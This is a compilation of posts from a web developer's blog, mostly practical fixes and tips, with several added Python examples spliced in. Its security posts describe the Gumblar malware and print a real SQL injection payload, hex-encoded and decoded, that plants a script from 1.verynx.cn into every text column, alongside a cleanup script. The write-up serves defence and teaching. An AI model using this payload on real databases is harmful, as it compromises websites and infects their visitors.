
10 Things To Do Before You Start Coding

Building on our experiences over the years, we’ve developed a list of key tasks to complete before developers write a single line of code. We hope these tips will save you some time on your next project.

1. Review everything

When it comes to any project, it’s important to review all the material that your sales team and project manager are handing you. Make sure you take the time to sit in a quiet area and read through all of the material, making notes as you go.

2. Ask Questions

Following up on the first task, it’s very important to ask lots of questions. Even if the answer to every question is a simple yes, never underestimate the importance of asking questions and clarifying your understanding of functionality.

3. Review proposed technology

Anytime someone makes a decision to use a specific technology to solve a problem, it’s always useful to review the technology proposed and ensure there are no missed opportunities. More often than not, the person recommending the technology is doing so based on tried and true past project successes. This, however, does not mean that new cutting-edge technology wouldn’t be a better fit.

4. Talk with your development team

Even if you deployed every piece of functionality on previous projects, it’s important to talk through what you’re going to be doing at a high level with your development team. It’s especially important to discuss functionality you’ve never deployed, such as a Twitter feed or other new technology solutions. More often than not, someone has a good idea to save you time, or recently solved a very time-consuming problem with one of the technologies you’ll be deploying.

5. Plan your attack

Take the time to sit in a quiet area, think about how you’ll be developing this solution and then write it down! We can’t stress enough how important it is to document what will be done first, second and so on. On top of that, it’s important to have this information available to your project manager; after all, he’s going to want reassurance that you can hit and deliver on the client’s timelines. Try using a Gantt chart to create your plan, as this is a simple yet effective way to dip your toes into this process.

6. Review your plan

Remember that even if you’ve spent two hours or six hours planning out what you’ll be developing first, second and last, it’s important to review this with the project manager. They’ll be able to provide necessary feedback on concerns about client expectations and potential bottlenecks you may not have considered.

7. Comp out functionality

At this point you should already have a design for your application; however, this design won’t illustrate every piece of functionality, and it’s not important to illustrate how a simple page will look before you get started. Any functionality that isn’t 100% cut and dry should be laid out. You can do this by hand, with many free layout tools, or simply work with a designer to create rough composites that you can show to the client for sign-off.

8. Review everything with a team member

Take the time to review your plan and comps with another developer. It’s always easier to have a mistake or suggestion pointed out to you now, before you’re 50% of the way through the project. Have the other developer review your plan and your comps, and talk him through everything so he understands what’s going to be developed without reading all of the information for the entire project.

9. Use pseudocode

Unless you’re the only developer in the world who doesn’t make mistakes or logic errors, this step is essential for success. Lay out your functionality in pseudocode, being as detailed as possible. Over time you’ll learn where details need to be very specific and where they can be a little less detailed. This process will help you stop logic problems within your code every single time.

10. Start coding!

By putting some planning upfront you’ve just saved yourself lots of pain and suffering moving forward.

Good luck – we hope this will save you some time and ensure things move smoothly for you on your next development project. Please share any tips you have for improving the development process in the comments.


David Millar, Lead Developer
Millar, as he is known around the office, is a rock-solid, workhorse coder. If anyone really understands what a chunk of code is doing it’s him. Family, friends, sports, and his wife are the most important things in life to him. He plays sports weekly and golf in the summer when he’s not busy hanging out with friends and family. Recently he got married to his wife Kate in a beautiful ceremony surrounded by friends and family on a perfect summer day. A humanitarian at heart, his positive demeanour is rattled most when “society makes decisions without considering more relevant information from the present”, and people “make self indulgent decisions that hurt society and everyone else”.


Crystal Reports Images not showing up

When deploying a .NET web application with Crystal Reports, you will need to install the appropriate Crystal Reports library on the server to use any reports you’ve built.

I recently ran into an issue where Crystal Reports Images (images in a report) would not show up on a new Windows 2003 Server.  After extensive web research with no solution in sight I decided to try to solve the problem on my own.

Note:  If you’re having problems with the images in the header bar (BusinessObjects toolbar) then please see this site below:
- http://www.gutgames.com/post/Crystal-Reports2c-issues2c-and-fixes.aspx
- or simply google “toolbar images for crystal reports not showing up”

To resolve my error I went into the Web Server (IIS) manager and performed the following steps:

1) Clicked on ‘My Website’ where I was using Crystal Reports
2) Clicked on ‘Handler Mappings’
3) On the right side under ‘Actions’ I selected ‘Add Managed Handler’
4) Request Path: CrystalImageHandler.aspx
5) Type: CrystalDecisions.Web.CrystalImageHandler, CrystalDecisions…….
6) Crystal Reports Image Handler
7) Press OK
Success!


I was able to track down this issue by looking at the URL for non-working images.  All pointed to the following:
http://www.MySite/CrystalImageHandler.aspx?*****useless info******

As you can see, the system is trying to access a handler to read out images specified in the report.

I hope this solution can save you hours of potentially wasted time and frustration.




WSS 403 Forbidden & DCOM Errors in Eventlog

One thing that can be frustrating for any developer is when you run into a problem and, despite millions of search results when searching for a resolution, nothing seems to solve the issue. I thought I would share some simple solutions to two very frustrating WSS issues we’ve run into this past year.

The first issue is intermittent 403 Forbidden errors on a WSS (Windows SharePoint Services) site. We were seeing anonymous users in our test environment who couldn’t use the website at all until an admin logged in. After someone had logged in, anyone could use the website with or without a login. What ended up being the problem was a permissions issue on the bin folder for the website. To fix this problem please follow the simple steps below.

  1. Ensure all sub folders that are virtual directories on the site are using the same application pool as the root site.  (This didn’t help me as everything was set properly, however I read countless posts of this causing problems for others)
  2. Add read access on the bin folder for the account IUSR.  (You don’t need to add read access to the files, which is somewhat confusing, but nonetheless that protects the files from being downloaded)
  3. Success!

If you have any other problems please post your questions/solutions below.

Continuing on, I also ran into a strange DCOM error popping up in Eventlog on most of our servers with WSS sites running.  The error looks like this…

The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {61738644-F196-11D0-9953-00C04FD919C1} to the user <serverName>\networkservice SID (S-1-5-21-<serviceSID>). This security permission can be modified using the Component Services administrative tool.

Needless to say, getting this error several hundred times a day in Eventlog is not ideal.  The resolution is rather simple but not overly easy to explain.  Please carefully follow the steps below.

  1. Copy the GUID (In my case it was {61738644-F196-11D0-9953-00C04FD919C1})
  2. Open the registry editor by running regedit
  3. Click on ‘My Computer’ at the top then select Edit -> Find and paste the GUID (remove the {})
  4. You should see an application name in the right pane when the GUID is found – in my case this was “IIS WAMREG admin service”
  5. Close the registry editor and open Component Services from Control Panel -> Administrative Tools
  6. Expand Component Services, My Computer, DCOM Config and find the application name discovered above in step #4.
  7. Right click on the application name and select “Properties” then select the Security tab
  8. The first block should be set to Customize – select edit on the right side.
  9. Now add the service account (in my case this was network service) and add the appropriate access which in my case was “Local Activation” (which you can see in the error above)
  10. Success!

Please share this information, as both of these errors can be frustrating and a waste of time.

Good luck and happy coding!


How to Set Up PHP (Apache, MySQL) on Windows

First, grab the latest copies of the following:

Apache (MSI with OpenSSL): http://httpd.apache.org/download.cgi
PHP Windows Binary (Zip Package): http://www.php.net/downloads.php
MySQL Community Engine (MSI): http://dev.mysql.com/downloads/mysql/5.1.html#win32
MySQL Tools (MSI): http://dev.mysql.com/downloads/gui-tools/5.0.html

Once you’ve downloaded the latest files follow these steps below:

  1. Install Apache
    1. Network Domain: it doesn’t matter
    2. Server Name: it doesn’t matter
  2. Unzip PHP into c:\php
  3. Install MySQL
  4. Install MySQL Tools
  5. Create a folder c:\websites (or call it what you want)
  6. Go to My Computer -> Right Click Properties -> Advanced -> Environment Variables
    1. Select Path -> Click Edit
    2. Add a ;c:\php on the end
  7. Restart your computer!
  8. Browse to the Apache Folder (Should be in Program Files\Apache Software Foundation\Apache)
    1. Go into conf and open httpd.conf
    2. Change the following and Save
      1. ServerRoot (Should be set to your Apache folder – nothing should be changed here)
      2. Listen (In the event you want your Apache WebServer to not run at localhost:80 – you can specify a specific ip/port here)
      3. In the LoadModule section you might want to enable rewrite_module (not necessary!)
      4. DocumentRoot "C:\websites"
      5. <Directory "C:\websites"> <– This is about ~15 lines below the document root (REQUIRED CHANGE)
      6. Under the DirectoryIndex save yourself some time and add index.php after index.html with a space separating them
  9. All Done making configuration changes to Apache
  10. Copy the index.html file in htdocs to c:\websites
  11. Click on the Apache Server Monitor in your TaskBar and restart Apache (if you have any problems check the logs folder in the Apache directory)
  12. Open your Web Browser and Browse to http://localhost – You should see ‘It Works’
    1. If this failed to work – check the settings you’ve changed (typos will break things) and also check the error logs in the apache\logs folder (Post any problems you can’t resolve in the comments)
  13. Now that you have Apache working – let’s get PHP working so you can start coding with PHP/MySQL
  14. Rename php.ini-distribution to php.ini
  15. Open php.ini
  16. Change the following and Save
    1. max_execution_time (Suggested for development to increase to 60)
    2. max_input_time (Suggested for development to increase to 120)
    3. memory_limit (Suggested for development to increase to 256M – great for any type of video conversion)
    4. error_reporting = E_ALL & ~E_NOTICE (Un-comment this and ensure other error_reporting lines are commented)
    5. display_errors = On
    6. log_errors = On
    7. session.save_path = "c:\tmp"
    8. post_max_size = 16M (Suggested for development)
    9. doc_root = (You can leave this blank)
    10. extension_dir = "c:\php\ext" (Required)
    11. upload_max_filesize = 16M (Suggested for development)
    12. Un-comment the following extensions:
      1. extension=php_curl.dll
      2. extension=php_gd2.dll
      3. extension=php_mbstring.dll
      4. extension=php_mcrypt.dll
      5. extension=php_mssql.dll
      6. extension=php_mysql.dll
      7. extension=php_openssl.dll
    13. If you have access to an SMTP server configure SMTP
  17. Re-open the httpd.conf for apache and add the following lines after the end of the LoadModule section
    1. LoadModule php5_module "C:/php/php5apache2_2.dll"
    2. AddType application/x-httpd-php .php
    3. PHPIniDir "C:/php"
  18. Restart Apache
  19. Create a file in c:\websites called test.php
  20. Put <?php phpinfo(); ?> in the file and save
  21. Access http://localhost/test.php
  22. You should see a dump of all the information – All the extensions you’ve loaded above should have a section within the information displayed (If you can’t find mysql on the page for example then the .dll did not load properly – Verify your Environment Path variable (restart if you change it) and try again)
  23. Don’t forget to look at your log files if you’re having problems – and if php says it can’t load a module that exists in a specific path then it’s likely an Environment Path issue.
  24. Happy Coding!


Gumblar.cn – Virus in the wild

We’ve been noticing a lot of traffic related to a new virus that has been attacking users/websites recently.

The virus works to exploit your system in several distinct ways.

  1. An infected PC transmits FTP information to Gumblar.cn
  2. Gumblar.cn connects to the FTP accounts submitted from infected PCs and injects code into any php/html pages it finds
  3. Any user visiting a site will have JavaScript run in their browser that does the following:
    1. Loads obfuscated JavaScript that connects to gumblar.cn if you’re running Windows and are not infected
    2. This in turn loads a nice piece of JavaScript that will load an SWF file
    3. This SWF file is the virus payload – it contains a byteArray that will inject a virus onto the computer (I believe it’s another SWF file being loaded as the byteArray)
  4. If this computer is running Windows and has Flash it will become infected
  5. See Step #1

The JavaScript code you’re looking for will look something like this:

One thing to note in the above code is the word gumblar in plain text.

When it comes to cleaning your webhost up you should take the following steps.

  1. Take your website down (turn the web server off – stop infecting your users)
  2. Remove the FTP information from your PC
  3. Change the FTP username/password on your webhost
  4. Look for new files created (image.php, etc…) that shouldn’t be there
  5. Now that you’ve removed the backdoor & changed the password you need to perform cleanup
  6. Find any PHP or HTML pages injected with the virus code and remove it

Once you’ve done this – everything should start getting back to normal.
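Added example (not part of the original post): a Python sketch of cleanup steps 4 and 6, walking a local copy of the web root and flagging web files that carry the plain-text gumblar marker noted above or that changed after a cutoff time. The function name, the extension list and the use of modification time as a stand-in for "new files" are assumptions made for illustration.

```python
import os
import re

WEB_EXTENSIONS = {".php", ".html", ".htm", ".js"}
MARKER = re.compile(rb"gumblar", re.IGNORECASE)
SCRIPT_BLOCK = re.compile(rb"<script\b.*?</script\s*>", re.IGNORECASE | re.DOTALL)


def scan_webroot(root, modified_since=None):
    """Return one finding per suspicious web file under root, sorted by path.

    modified_since is a Unix timestamp (for example, shortly before the first
    sign of infection). Files changed at or after it are flagged even without
    the marker, which is how dropped files such as image.php show up.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as handle:
                    data = handle.read()
                mtime = os.path.getmtime(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            # Byte offsets of <script> blocks that contain the marker.
            script_offsets = [
                block.start()
                for block in SCRIPT_BLOCK.finditer(data)
                if MARKER.search(block.group(0))
            ]
            # Marker present but not inside a complete <script> block
            # (for example in a standalone .js file).
            marker_elsewhere = not script_offsets and bool(MARKER.search(data))
            recent = modified_since is not None and mtime >= modified_since
            if script_offsets or marker_elsewhere or recent:
                findings.append({
                    "path": os.path.relpath(path, root),
                    "script_offsets": script_offsets,
                    "marker_elsewhere": marker_elsewhere,
                    "recent": recent,
                })
    return sorted(findings, key=lambda item: item["path"])
```

The marker only catches injections that still contain the string in plain text, so review the files flagged as recently changed by hand as well.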

There have been some useful scripts posted in the comments about this virus at blog.unmaskparasites.com.

If you’ve had any success or troubles with this virus please post your comments below.

If anyone knows of an easy way to convert a byteArray that’s being passed to an ActionScript Loader back into readable text please leave me a comment below.

Good Luck!


Konami Code – Cheat Code – Easter Egg

Have you ever thought about adding an Easter Egg to your website?

Using a Cheat Code such as the Konami Code you can now easily add one to your website using jQuery and the plugin that Trevor Morris developed.  Get the plugin here.

The code is simple and easy to follow. Here’s a snippet to demonstrate how simple it is to perform a basic JavaScript action.

	$(document).ready(function() {
		$(document).cheatCode({
			code : '38,38,40,40,37,39,37,39,66,65',
			activated : function(){
				alert('Hidden');
			}
		});
	});

Don’t forget you’ll need to grab a copy of jQuery if you don’t already have it loaded up!

Please let us know if you like our Easter Egg.


Boldly go… to the movies (courtesy of rtraction)

UPDATE – The movie was fantastic and we all had a great time. We’ll be having another event later this summer so keep your eye on our blog or our Twitter feed for more info.

We’re considering 3 flicks for the next outing – District 9, Terminator Salvation and Transformers: Revenge of the Fallen – e-mail (contests@rtraction.com) or tweet (www.twitter.com/rtraction) your opinion.

CONTEST CLOSED – We’re all pretty pumped about this Friday’s launch of the new “Star Trek” movie, and we want to share the joy. We’ve got 25 free tickets* to give away. If you’re available to join us in London, Ontario on Friday May 8th for a 3:30pm showing of Star Trek, you can join us at SilverCity Masonville. Just send an email to rtraction at contests@rtraction.com and tell us the middle name of Captain James Kirk. Easy, right? The first 25 people to submit correct answers will win.

Live long and prosper!

* And we mean FREE – no presentations, no sales pitches and definitely no spamming you later. No strings – we’re just looking for some good company for what promises to be a great flick.

· Sorry no rainchecks but keep your eye on our Twitter feed throughout the summer for more events.


Looking up CSS Styles in JavaScript

This can be extremely useful in the event you have a toolbar, menu, or custom piece of code that is changing styles on the fly. We had a need to look up CSS Styles affecting an object on our page with JavaScript. Unfortunately, it’s not as easy as document.getElementById('myobject').style.background. If you want to get the CSS styles that have been set by other JavaScript code, you’ll need to use this function to look up those styles. Let’s say you want to put a div at the top of the page, but doing so would break the background styles on the body. You can look up those styles, make an adjustment for the height of your div and then display it.

One thing to note is that IE and Firefox (as well as other W3C standards browsers) use a different function to accomplish this.  The W3C standard function is “getComputedStyle” whereas IE uses the proprietary “currentStyle”.

A working script for IE and Firefox is below:

var getstylebanner = function(prop, element) {
    if (element.style[prop]) {
        return element.style[prop]; /* inline style set directly on the element */
    }
    else if (element.currentStyle) {
        return element.currentStyle[prop]; /* IE: proprietary currentStyle */
    }
    else if (document.defaultView && document.defaultView.getComputedStyle) { /* Firefox and other W3C browsers */
        /* getPropertyValue expects hyphenated names: marginTop -> margin-top */
        prop = prop.replace(/([A-Z])/g, "-$1");
        prop = prop.toLowerCase();
        return document.defaultView.getComputedStyle(element, "").getPropertyValue(prop);
    }
};

An example of looking up the top margin on the body of your page:

var marginTop = getstylebanner('marginTop', document.body);

Technology & You – Canadian Federal Election – Oct. 14th

With major concerns in the Information Technology industry around Digital Rights Management (DRM), the Canadian version of the Digital Millennium Copyright Act (DMCA) named “Bill C-61” and other hot topic issues, you need to know where your politician stands on these critical topics that could affect every man, woman and child in Canada. Where does each party stand on open source software, DRM, Copyright Reform, Net Neutrality?

What are the current government’s views on these topics? Well, we can make assumptions based on the copyright bill “Bill C-61” but unfortunately at this point we don’t have any promises or statements from the Conservative Party of Canada on any of these topics. We were shocked that most parties didn’t include any of these critical issues in their platforms. South of the border, in the current presidential election, each candidate has specifically noted their stance on many technology issues facing their IT industry.

After reviewing the New Democratic Party’s platform we found that none of these important topics are mentioned; however, at the very least they’ve expressed their views on copyright reform in several news releases. Specifically, we were able to find out that the Green Party of Canada and some NDP MPs are in support of a copyright reform proposal by Michael Geist. Obviously these vital topics not registering on parties’ platforms is far from ideal, so we were again surprised to see that the Liberal Party of Canada had nothing on all of these topics, along with the BLOC Québécois.

The only party that has addressed these issues in their official party platform is the Green Party of Canada. You can read more about their views here and here. We must applaud the Green Party for taking a stance on these important issues.  The Green Party has come out in support for open source software development, and open discussions on a variety of topics including internet privacy, copyright and DRM issues.  This is a step in the right direction but rather disappointing that no other parties are providing their views and stances on these important issues.

We need to demand more as professionals in the IT field and help our politicians make informed decisions on these critical issues by providing information, support and feedback.

Let’s work together and demand that all parties in Canada provide their stance on technology challenges moving forward within Canada and internationally.

Don’t forget to exercise your rights and Vote!

For more information on these topics we recommend Michael Geist’s blog. We would also recommend contacting your member of parliament and all political parties to bring these important issues to their attention. Click here to find your member of parliament.


SQL Injection Hack using CAST from 1.verynx.cn

Update

If the attack has changed to a different URL simply replace the URL in the solution script below. That is assuming the rest of the syntax has not changed.

Hope that helps


A new SQL injection hack seems to be out in the wild from verynx.cn. The SQL injection hack uses a CHAR array to hide its payload, which inserts various HTML garbage along with a reference to a JavaScript file on the verynx.cn domain that will infect users when they visit your website. Luckily the domain with the offending JavaScript file now points to 127.0.0.1, which will help stop the spread of the virus. Unfortunately the botnet still seems to be spamming websites with the scripted attack, leaving many entirely broken or loading extremely slowly, as each page might have hundreds of requests to the payload.

The attack below works like this:

You have a web page like www.mywebsite.com/showproducts.aspx?categoryId=12. An attacker visits your website with SQL code appended to the number 12 in the sample URL provided. A simple attack would look like www.mywebsite.com/showproducts.aspx?categoryId=12;SELECT * from tblProducts;. As you can see the attacker is guessing at the table name and hoping to get all of the information dumped back to them when you pass the categoryId to the database. Below you can see a much more complicated attack where they’ve used a CHAR array and then used the CAST command to have your SQL Server convert the array so it can be executed.

Sample of Attack:

;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Un-Obfuscated Attack:

;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
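Added example (not part of the original post): a Python sketch that automates the un-obfuscation step above when triaging web server logs. It URL-decodes each line, finds CAST(0x… AS CHAR(n)) literals, hex-decodes them and extracts any script URLs. The log lines, function names and placeholder.example URL are constructed for illustration, and the NVARCHAR handling goes beyond the CHAR case shown above.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS [N][VAR]CHAR(n)); spacing and letter case vary between runs.
CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\s*\(\s*(?:\d+|MAX)\s*\)\s*\)",
    re.IGNORECASE,
)
# EXEC(@S) after the CAST means the decoded text is run as SQL.
EXEC_VAR = re.compile(r"\bEXEC(?:UTE)?\s*\(\s*@\w+\s*\)", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def triage_request(logged_text):
    """Decode every hex CAST literal found in a logged URL or query string."""
    # Logs store the request URL-encoded (%20, +), so decode before matching.
    text = unquote_plus(logged_text)
    findings = []
    for match in CAST_HEX.finditer(text):
        hex_digits, sql_type = match.group(1), match.group(2).upper()
        finding = {
            "decoded": None,
            "script_urls": [],
            "executed": bool(EXEC_VAR.search(text, match.end())),
        }
        if len(hex_digits) % 2 == 0:
            raw = bytes.fromhex(hex_digits)
            # NCHAR/NVARCHAR payloads are UTF-16LE; CHAR/VARCHAR are single-byte.
            encoding = "utf-16-le" if sql_type.startswith("N") else "latin-1"
            finding["decoded"] = raw.decode(encoding, errors="replace")
            finding["script_urls"] = SCRIPT_SRC.findall(finding["decoded"])
        # Odd-length hex is still reported (decoded=None): damaged in transit or
        # in the log, but the request was an injection attempt all the same.
        findings.append(finding)
    return findings


def scan_log_lines(lines):
    """Return (line_number, finding) for every suspicious request in a log."""
    return [
        (number, finding)
        for number, line in enumerate(lines, start=1)
        for finding in triage_request(line)
    ]


# Constructed sample: a harmless SELECT stands in for the real payload.
INNER_SQL = "SELECT '<script src=\"http://placeholder.example/w.js\"></script>' AS marker"
SAMPLE_LOG = [
    "2000-01-01 00:00:00 GET /showproducts.aspx categoryId=12 200",
    "2000-01-01 00:00:05 GET /showproducts.aspx categoryId=12;DECLARE%20@S%20CHAR(4000);"
    "SET%20@S=CAST(0x" + INNER_SQL.encode("ascii").hex().upper()
    + "%20AS%20CHAR(4000));EXEC(@S); 200",
]

if __name__ == "__main__":
    for number, finding in scan_log_lines(SAMPLE_LOG):
        print(number, finding)
```

The script URLs it reports tell you which string to search for in the database during cleanup.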

Tips to prevent SQL Injection Hacks:

Do not trust user data. The easiest solution for resolving most issues with SQL injections is to clean all incoming data. For any type of number or ID this is pretty easy, as you can ensure any incoming number safely converts to a number (int for example). Likewise, you can ensure other IDs such as GUIDs convert safely to GUIDs before passing any information to your database.

Another simple fix – if you don’t need execute – ensure the user connecting to your database doesn’t have execute permissions.
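Added example (not part of the original post): the "converts safely" check from the first tip written out in Python, together with a parameterized query so the value is never concatenated into SQL. An in-memory sqlite3 database stands in for SQL Server here, and the function names and sample rows are assumptions; tblProducts and categoryId come from the sample URL above.

```python
import re
import sqlite3
import uuid

# ASCII digits only, at most 9 of them so the value always fits a 32-bit int.
_INT_ID = re.compile(r"[0-9]{1,9}")


def parse_int_id(raw):
    """Strict integer check. int() alone also accepts ' 12', '+12', '1_2'
    and non-ASCII digits, so match the exact form first."""
    if not isinstance(raw, str) or not _INT_ID.fullmatch(raw):
        raise ValueError("invalid integer id")
    return int(raw)


def parse_guid_id(raw):
    """Accept only the canonical 8-4-4-4-12 form. uuid.UUID() also takes
    braces, a urn:uuid: prefix and bare hex, so compare after parsing."""
    try:
        value = uuid.UUID(raw)
    except (ValueError, AttributeError, TypeError):
        raise ValueError("invalid GUID") from None
    if str(value) != raw.lower():
        raise ValueError("invalid GUID")
    return value


def make_demo_db():
    """Constructed sample data for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tblProducts (id INTEGER PRIMARY KEY, categoryId INTEGER, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO tblProducts (categoryId, name) VALUES (?, ?)",
        [(12, "Widget"), (12, "Gadget"), (7, "Gizmo")],
    )
    return conn


def products_in_category(conn, raw_category_id):
    """Validate first, then bind the value as a parameter."""
    category_id = parse_int_id(raw_category_id)
    rows = conn.execute(
        "SELECT name FROM tblProducts WHERE categoryId = ? ORDER BY name",
        (category_id,),
    )
    return [row[0] for row in rows]


def bound_lookup(conn, raw_value):
    """Binding alone: the raw text is compared as data, never parsed as SQL."""
    rows = conn.execute(
        "SELECT name FROM tblProducts WHERE categoryId = ?", (raw_value,)
    )
    return [row[0] for row in rows]
```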

Solution (Fixing your database after the attack):

Here we turn their code into the solution as we use the same process to loop through the entire database and remove what they’ve inserted into the database.

-- Loop over every text, ntext, varchar and nvarchar column in every user table
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    -- Remove the injected string from this column
    exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Additional Links:

All the details you need to understand SQL Injection: http://en.wikipedia.org

SQL Injection Cheat Sheet: http://ferruh.mavituna.com

SQL Injection Attack Detection Tools: http://52coding.com

Essential Security Considerations: http://nettuts.com

PHP+Mysql tips for preventing SQL injections: http://www.johnrockefeller.net

What to do if you’re still stuck:

Post your questions in the comments below and we will answer them as quickly as possible – also if anyone has any useful information we will update the article to share that information with others.